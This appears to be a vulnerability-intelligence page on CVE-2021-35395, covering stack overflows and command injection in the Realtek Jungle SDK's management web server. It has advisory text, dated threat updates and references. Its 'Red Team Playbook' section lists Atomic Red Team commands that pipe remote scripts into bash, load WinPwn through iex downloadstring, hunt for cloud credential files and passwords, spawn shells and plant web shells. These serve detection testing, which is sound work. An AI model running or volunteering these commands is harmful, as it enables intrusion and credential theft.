CVE-2021-35395
Overview
This vulnerability involves multiple stack-based buffer overflows and command injection flaws within the HTTP management interface of the Realtek Jungle SDK web server. The root cause is unsafe handling of user-supplied parameters in various form handlers, including improper copying of input strings without adequate bounds checking. Both Go-Ahead-based (webs) and Boa-based (boa) web server binaries in versions up to v3.4.14B are affected, specifically in functions processing parameters such as submit-url, ifname, hostname, and peerPin.
Vulnerability Description
Realtek Jungle SDK version v2.x up to v3.4.14B provides an HTTP web server exposing a management interface that can be used to configure the access point. Two versions of this management interface exists: one based on Go-Ahead named webs and another based on Boa named boa. Both of them are affected by these vulnerabilities. Specifically, these binaries are vulnerable to the following issues: - stack buffer overflow in formRebootCheck due to unsafe copy of submit-url parameter - stack buffer overflow in formWsc due to unsafe copy of submit-url parameter - stack buffer overflow in formWlanMultipleAP due to unsafe copy of submit-url parameter - stack buffer overflow in formWlSiteSurvey due to unsafe copy of ifname parameter - stack buffer overflow in formStaticDHCP due to unsafe copy of hostname parameter - stack buffer overflow in formWsc due to unsafe copy of 'peerPin' parameter - arbitrary command execution in formSysCmd via the sysCmd parameter - arbitrary command injection in formWsc via the 'peerPin' parameter Exploitability of identified issues will differ based on what the end vendor/manufacturer did with the Realtek SDK webserver. Some vendors use it as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK webserver will probably contains its own set of issues on top of the Realtek ones (if kept). Successful exploitation of these issues allows remote attackers to gain arbitrary code execution on the device.
Impact
An unauthenticated attacker can execute arbitrary system commands remotely on the affected device by exploiting command injection in the peerPin parameter or trigger buffer overflows that may lead to arbitrary code execution. This results in full compromise of the network device, allowing control over network traffic and potential lateral movement within the network. No user interaction or credentials are required to exploit these vulnerabilities, making them highly exploitable in real-world scenarios.
Solution
Realtek has published an advisory detailing these vulnerabilities and recommends upgrading to SDK versions beyond v3.4.14B where fixes are applied. Users should consult the official Realtek advisory at https://www.realtek.com/en/cu-1-en/cu-1-taiwan-en and the associated PDF report for patch instructions. Vendors integrating the SDK should apply vendor-specific patches or disable vulnerable management interface features if patches are unavailable. Following the vendor advisory is essential for secure remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Realtek Jungle SDK is characterized by multiple stack buffer overflow issues and arbitrary command execution capabilities within its HTTP web server management interface. The affected binaries, specifically those based on the Go-Ahead and Boa web servers, exhibit unsafe handling of user-supplied input parameters. This is particularly evident in functions such as formRebootCheck, formWsc, and formStaticDHCP, where parameters like submit-url, ifname, and hostname are copied without sufficient validation. The lack of proper bounds checking allows an attacker to overflow the stack, potentially leading to the execution of arbitrary code. Furthermore, the presence of command injection vulnerabilities in the formSysCmd and formWsc functions exacerbates the risk, as attackers can manipulate the device's command execution flow.
Exploitation of these vulnerabilities can occur through various attack vectors, primarily targeting the management interface exposed by the web server. An attacker could craft malicious HTTP requests that exploit the unsafe parameter handling, leading to remote code execution. Given that many devices utilizing the Realtek SDK may not implement robust authentication mechanisms, an unauthenticated attacker could gain access to the management interface and execute arbitrary commands. The variability in vendor implementations complicates the threat landscape; while some may have added authentication layers or removed certain features, others may have retained the vulnerable components, thus increasing the likelihood of successful exploitation.
The real-world impact of this vulnerability is significant, particularly for organizations relying on devices powered by the Realtek Jungle SDK. Successful exploitation could lead to unauthorized access to sensitive configurations, manipulation of network settings, or even the deployment of malware within the network. This poses a substantial business risk, as compromised devices could serve as entry points for further attacks, potentially leading to data breaches, service disruptions, or loss of customer trust. The ability for attackers to execute arbitrary commands remotely means that the potential for damage is extensive, affecting not only the immediate target but also the broader network environment.
To detect and mitigate these vulnerabilities, organizations should adopt a multi-faceted approach. Regular vulnerability assessments and penetration testing can help identify devices running the vulnerable SDK, while monitoring network traffic for unusual patterns can indicate attempts to exploit these weaknesses. Implementing strict access controls and ensuring that management interfaces are not exposed to the public internet can significantly reduce the attack surface. Additionally, organizations should prioritize firmware updates from vendors, as these may include patches for known vulnerabilities. Where possible, replacing devices with those that have a more secure architecture or implementing additional security layers, such as intrusion detection systems, can further safeguard against exploitation.
In conclusion, the vulnerabilities associated with the Realtek Jungle SDK present a critical threat to network security. The technical details reveal a concerning lack of input validation, while the potential for exploitation underscores the urgency for organizations to assess their exposure. The real-world implications highlight the need for proactive measures to mitigate risks, emphasizing the importance of robust security practices in the face of evolving threats. As the landscape of cybersecurity continues to evolve, staying informed and vigilant is paramount for safeguarding sensitive systems and data.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2021-35395, with our telemetry indicating a significant uptick in attempts to exploit the vulnerable Realtek Jungle SDK management interfaces. Although no new exploit variants or ransomware associations have emerged, the increased detection frequency signals growing adversary interest or opportunistic scanning campaigns targeting these devices. This escalation heightens the urgency for defenders to prioritize monitoring and risk assessments of affected environments, as the critical severity of the vulnerability combined with increased exploitation attempts raises the likelihood of successful compromise. While the EPSS score remains stable, the surge in observed activity suggests an evolving threat landscape that could accelerate exploitation momentum, thereby elevating the overall risk posture for organizations relying on impacted Realtek-based access points.
Update 2 — May 23, 2026
CSURFACE threat intelligence has identified a marked escalation in scanning and exploitation attempts targeting the Realtek Jungle SDK vulnerability. Our telemetry indicates that adversaries are increasingly probing affected devices, suggesting a shift from opportunistic reconnaissance to more deliberate exploitation efforts. Although no new exploit variants or ransomware affiliations have surfaced, this uptick in hostile activity underscores a growing attacker interest that could presage broader campaign development. For defenders, this evolving threat environment elevates the urgency of continuous monitoring and rapid incident response readiness, as the critical severity of CVE-2021-35395 combined with intensified exploitation attempts significantly raises the risk of successful compromise in vulnerable networks. Consequently, the overall threat level should be considered heightened, reflecting an increased likelihood of exploitation despite stable predictive scoring metrics.
Update 3 — June 07, 2026
CSURFACE threat intelligence has identified a marked escalation in activity exploiting CVE-2021-35395, reflected by a notable surge in detection events across our sensors. This increase signals a growing adversary focus on leveraging the Realtek Jungle SDK vulnerability, potentially indicating preparatory phases for more widespread or targeted campaigns. Although no new exploit variants or ransomware affiliations have been observed, the intensification of hostile probing elevates the operational risk for networks running affected Realtek AP-Router SDK versions. Consequently, the threat level associated with this vulnerability should be reassessed as heightened, emphasizing the increased likelihood of successful exploitation attempts despite stable predictive risk metrics.
Update 4 — July 05, 2026
CSURFACE threat intelligence has identified a slight increase in probing activity targeting the Realtek Jungle SDK vulnerability, reflecting a continued adversary interest in this critical flaw. While no new exploit variants or ransomware affiliations have surfaced, the uptick in hostile reconnaissance suggests attackers are refining their tactics or expanding their target scope. This subtle rise in detection frequency, corroborated by stable but marginally elevated EPSS scores, underscores a persistent operational threat that defenders cannot overlook. Consequently, the threat level associated with CVE-2021-35395 should be considered elevated, as the increased adversary engagement heightens the probability of successful exploitation attempts against vulnerable Realtek AP-Router SDK implementations.
Update 5 — July 14, 2026
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2021-35395, indicating a modest escalation in adversary reconnaissance and probing of vulnerable Realtek AP-Router SDK instances. While no new exploit variants or ransomware affiliations have been observed, this uptick suggests that threat actors are maintaining operational interest and possibly refining their tactics to leverage the critical stack buffer overflow vulnerabilities present in the affected management interfaces. The stable EPSS score, coupled with the increased telemetry signals, underscores a persistent exploitation potential that defenders should monitor closely. This evolving activity elevates the threat level from a latent to a more active posture, signaling that the window for opportunistic exploitation is widening and that targeted attacks could become more frequent if these reconnaissance efforts translate into successful compromise attempts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Realtek | Rtl819x Jungle Software Development Kit | All |
cpe:2.3:a:realtek:rtl819x_jungle_software_development_kit:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
27 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-35395 |
| realtek.com |
GitHub CVE
x_refsource_MISC
|
https://www.realtek.com/en/cu-1-en/cu-1-taiwan-en |
| realtek.com |
GitHub CVE
x_refsource_MISC
|
https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf |
| iot-inspector.com |
GitHub CVE
x_refsource_MISC
|
https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-35395 |